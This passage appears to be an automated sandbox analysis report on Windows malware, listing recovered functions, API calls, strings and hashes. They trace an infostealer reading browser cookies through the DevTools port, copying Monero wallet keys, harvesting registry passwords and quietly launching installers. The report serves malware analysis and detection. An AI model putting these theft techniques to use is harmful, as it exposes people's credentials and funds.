                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateGlobalStream
                                      • String ID: image/jpeg
                                      • API String ID: 2244384528-3785015651
                                      • Opcode ID: 15abc6e36c1a42deb63380167b6df408864b6e4785502a68d6876fc647d9b847
                                      • Instruction ID: ba60c9d3abfef858dd97b9941f0fca9f45fdb03db3c38dd934d07031a5e2c3f4
                                      • Opcode Fuzzy Hash: 15abc6e36c1a42deb63380167b6df408864b6e4785502a68d6876fc647d9b847
                                      • Instruction Fuzzy Hash: 8971ED71A10258ABDB14DFE4EC85FEEB77DBF48700F108618F616AB290DB34A944CB60
                                      Function 00123080 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00123415
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 001235AD
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 0012373A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExecuteShell$lstrcpy
                                      • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                      • API String ID: 2507796910-3625054190
                                      • Opcode ID: 8bc932f4dd9cd9e12db70e737fdd4b33a2926dfaf371f1f4b1fe1113ccf33182
                                      • Instruction ID: 3f3e24f50fd37505b419d2c879de98f30e55420d273ac28807bd4e4991d308f8
                                      • Opcode Fuzzy Hash: 8bc932f4dd9cd9e12db70e737fdd4b33a2926dfaf371f1f4b1fe1113ccf33182
                                      • Instruction Fuzzy Hash: E1121F719101289BCB19FBA0EDA2FEDB779AF24300F804599F50676191EF342B69CF61
                                      Function 00119BE0 Relevance: 19.6, APIs: 8, Strings: 5, Instructions: 146stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00119A50: InternetOpenA.WININET(00130AF6,00000001,00000000,00000000,00000000), ref: 00119A6A
                                      • lstrcat.KERNEL32(?,cookies), ref: 00119CAF
                                      • lstrcat.KERNEL32(?,001312C4), ref: 00119CC1
                                      • lstrcat.KERNEL32(?,?), ref: 00119CD5
                                      • lstrcat.KERNEL32(?,001312C8), ref: 00119CE7
                                      • lstrcat.KERNEL32(?,?), ref: 00119CFB
                                      • lstrcat.KERNEL32(?,.txt), ref: 00119D0D
                                      • lstrlen.KERNEL32(00000000), ref: 00119D17
                                      • lstrlen.KERNEL32(00000000), ref: 00119D26
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrlen$InternetOpenlstrcpy
                                      • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                      • API String ID: 3174675846-3542011879
                                      • Opcode ID: 4a69f32511967f73431f770b501cd485e21144d7ea092373475ac90b48b7ad77
                                      • Instruction ID: ad00dc73a08b5a194229936ae9383818e2f9c342d37f2beaa0b765af735fdb68
                                      • Opcode Fuzzy Hash: 4a69f32511967f73431f770b501cd485e21144d7ea092373475ac90b48b7ad77
                                      • Instruction Fuzzy Hash: 02513271910618ABDB18EBE0EC95FEE773CAF14301F404698F205A7091EF756A89CF61
                                      Function 00125510 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0012AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0012AAF6
                                        • Part of subcall function 001162D0: InternetOpenA.WININET(00130DFF,00000001,00000000,00000000,00000000), ref: 00116331
                                        • Part of subcall function 001162D0: StrCmpCA.SHLWAPI(?,00E3F970), ref: 00116353
                                        • Part of subcall function 001162D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00116385
                                        • Part of subcall function 001162D0: HttpOpenRequestA.WININET(00000000,GET,?,00E3F0E0,00000000,00000000,00400100,00000000), ref: 001163D5
                                        • Part of subcall function 001162D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0011640F
                                        • Part of subcall function 001162D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00116421
                                        • Part of subcall function 0012ABB0: lstrcpy.KERNEL32(?,00130E1A), ref: 0012AC15
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00125568
                                      • lstrlen.KERNEL32(00000000), ref: 0012557F
                                        • Part of subcall function 00128FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00128FE2
                                      • StrStrA.SHLWAPI(00000000,00000000), ref: 001255B4
                                      • lstrlen.KERNEL32(00000000), ref: 001255D3
                                      • lstrlen.KERNEL32(00000000), ref: 001255FE
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                      • API String ID: 3240024479-1526165396
                                      • Opcode ID: 9a529e2acc89a66fd24f95edb94b615f5f138fe676313d95c9c1721115c8ff47
                                      • Instruction ID: 74c1d7ff90c9aa3178436e8970d0f37f5d64e56601b0667b29bf0d9951a12b5f
                                      • Opcode Fuzzy Hash: 9a529e2acc89a66fd24f95edb94b615f5f138fe676313d95c9c1721115c8ff47
                                      • Instruction Fuzzy Hash: 0B511030910158EBCB18FF60EDA6AED777AAF20340FD04458F9066B591EF306B54CB62
                                      Function 00121520 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpylstrlen
                                      • String ID:
                                      • API String ID: 2001356338-0
                                      • Opcode ID: 09dd72aa29c738ad2fa844f143f41dfe5663d090ba517b0ab58349b5d92a291d
                                      • Instruction ID: 837ba0e3f38036c91fea529d9bbe18b6821e613724aef85b40ba442a429f42fd
                                      • Opcode Fuzzy Hash: 09dd72aa29c738ad2fa844f143f41dfe5663d090ba517b0ab58349b5d92a291d
                                      • Instruction Fuzzy Hash: F5C163B5900129ABCB18EF60EC9AFDE7379BF74304F004599F509A7281DB70AA95CF91
                                      Function 001244D0 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00128F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00128F9B
                                      • lstrcat.KERNEL32(?,00000000), ref: 0012453C
                                      • lstrcat.KERNEL32(?,00E3F6E0), ref: 0012455B
                                      • lstrcat.KERNEL32(?,?), ref: 0012456F
                                      • lstrcat.KERNEL32(?,00E3DE80), ref: 00124583
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                        • Part of subcall function 00128F20: GetFileAttributesA.KERNEL32(00000000,?,00111B94,?,?,0013577C,?,?,00130E22), ref: 00128F2F
                                        • Part of subcall function 0011A430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0011A489
                                        • Part of subcall function 0011A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0011A13C
                                        • Part of subcall function 0011A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0011A161
                                        • Part of subcall function 0011A110: LocalAlloc.KERNEL32(00000040,?), ref: 0011A181
                                        • Part of subcall function 0011A110: ReadFile.KERNEL32(000000FF,?,00000000,0011148F,00000000), ref: 0011A1AA
                                        • Part of subcall function 0011A110: LocalFree.KERNEL32(0011148F), ref: 0011A1E0
                                        • Part of subcall function 0011A110: CloseHandle.KERNEL32(000000FF), ref: 0011A1EA
                                        • Part of subcall function 00129550: GlobalAlloc.KERNEL32(00000000,0012462D,0012462D), ref: 00129563
                                      • StrStrA.SHLWAPI(?,00E3F6B0), ref: 00124643
                                      • GlobalFree.KERNEL32(?), ref: 00124762
                                        • Part of subcall function 0011A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00114F3E,00000000,00000000), ref: 0011A23F
                                        • Part of subcall function 0011A210: LocalAlloc.KERNEL32(00000040,?,?,?,00114F3E,00000000,?), ref: 0011A251
                                        • Part of subcall function 0011A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00114F3E,00000000,00000000), ref: 0011A27A
                                        • Part of subcall function 0011A210: LocalFree.KERNEL32(?,?,?,?,00114F3E,00000000,?), ref: 0011A28F
                                      • lstrcat.KERNEL32(?,00000000), ref: 001246F3
                                      • StrCmpCA.SHLWAPI(?,001308D2), ref: 00124710
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 00124722
                                      • lstrcat.KERNEL32(00000000,?), ref: 00124735
                                      • lstrcat.KERNEL32(00000000,00130FA0), ref: 00124744
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                      • String ID:
                                      • API String ID: 3541710228-0
                                      • Opcode ID: 8f28de8491483e4b35a42b381fbeed5512ab4caaa32a2dd509dc49cb7ba0b152
                                      • Instruction ID: aec708f8193d3adaf9e697456b512e985e314ffe6076ed24c33aa0ec328ad524
                                      • Opcode Fuzzy Hash: 8f28de8491483e4b35a42b381fbeed5512ab4caaa32a2dd509dc49cb7ba0b152
                                      • Instruction Fuzzy Hash: 747174B6900218ABDB14EBA0ED96FEE777DAF98300F404698F60597181EB34DB54CF51
                                      Function 00111310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 001112A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 001112B4
                                        • Part of subcall function 001112A0: RtlAllocateHeap.NTDLL(00000000), ref: 001112BB
                                        • Part of subcall function 001112A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 001112D7
                                        • Part of subcall function 001112A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 001112F5
                                        • Part of subcall function 001112A0: RegCloseKey.ADVAPI32(?), ref: 001112FF
                                      • lstrcat.KERNEL32(?,00000000), ref: 0011134F
                                      • lstrlen.KERNEL32(?), ref: 0011135C
                                      • lstrcat.KERNEL32(?,.keys), ref: 00111377
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                        • Part of subcall function 0012ACC0: lstrlen.KERNEL32(?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 0012ACD5
                                        • Part of subcall function 0012ACC0: lstrcpy.KERNEL32(00000000), ref: 0012AD14
                                        • Part of subcall function 0012ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0012AD22
                                        • Part of subcall function 0012ABB0: lstrcpy.KERNEL32(?,00130E1A), ref: 0012AC15
                                        • Part of subcall function 00128CF0: GetSystemTime.KERNEL32(00130E1B,00E3E7B8,001305B6,?,?,001113F9,?,0000001A,00130E1B,00000000,?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 00128D16
                                        • Part of subcall function 0012AC30: lstrcpy.KERNEL32(00000000,?), ref: 0012AC82
                                        • Part of subcall function 0012AC30: lstrcat.KERNEL32(00000000), ref: 0012AC92
                                      • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00111465
                                        • Part of subcall function 0012AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0012AAF6
                                        • Part of subcall function 0011A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0011A13C
                                        • Part of subcall function 0011A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0011A161
                                        • Part of subcall function 0011A110: LocalAlloc.KERNEL32(00000040,?), ref: 0011A181
                                        • Part of subcall function 0011A110: ReadFile.KERNEL32(000000FF,?,00000000,0011148F,00000000), ref: 0011A1AA
                                        • Part of subcall function 0011A110: LocalFree.KERNEL32(0011148F), ref: 0011A1E0
                                        • Part of subcall function 0011A110: CloseHandle.KERNEL32(000000FF), ref: 0011A1EA
                                      • DeleteFileA.KERNEL32(00000000), ref: 001114EF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                      • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                      • API String ID: 3478931302-218353709
                                      • Opcode ID: f1fd7fe58423108e4142840ff06c34c85ed4970e6bfa92730e365e6963abe39d
                                      • Instruction ID: 7a3efcda2181dfe0228703870bf315ee40a5c4f24fc73625211d0535c9cb005f
                                      • Opcode Fuzzy Hash: f1fd7fe58423108e4142840ff06c34c85ed4970e6bfa92730e365e6963abe39d
                                      • Instruction Fuzzy Hash: BE5136B1D5012857CB15FB60ED92FED737DAF64700F8045E8B60A66091EF306B98CB65
                                      Function 00119A50 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 107networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetOpenA.WININET(00130AF6,00000001,00000000,00000000,00000000), ref: 00119A6A
                                      • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00119AAB
                                      • InternetCloseHandle.WININET(00000000), ref: 00119AC7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$Open$CloseHandle
                                      • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                      • API String ID: 3289985339-2144369209
                                      • Opcode ID: 57934a3b32bea57a5bcc239728d9c4b19a11e4d260936dea2b4e9b91803dbc8f
                                      • Instruction ID: 473a5ee756dfbee338ef9d8b066b6d137537d4b094a011153e1d4d85225d1d30
                                      • Opcode Fuzzy Hash: 57934a3b32bea57a5bcc239728d9c4b19a11e4d260936dea2b4e9b91803dbc8f
                                      • Instruction Fuzzy Hash: 7C414C75A10258EFCB29EF90EC95FDD77B8AB58740F104198F509AB190CBB0AEC4CB64
                                      Function 00117630 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00117330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0011739A
                                        • Part of subcall function 00117330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00117411
                                        • Part of subcall function 00117330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0011746D
                                        • Part of subcall function 00117330: GetProcessHeap.KERNEL32(00000000,?), ref: 001174B2
                                        • Part of subcall function 00117330: HeapFree.KERNEL32(00000000), ref: 001174B9
                                      • lstrcat.KERNEL32(00000000,0013192C), ref: 00117666
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 001176A8
                                      • lstrcat.KERNEL32(00000000, : ), ref: 001176BA
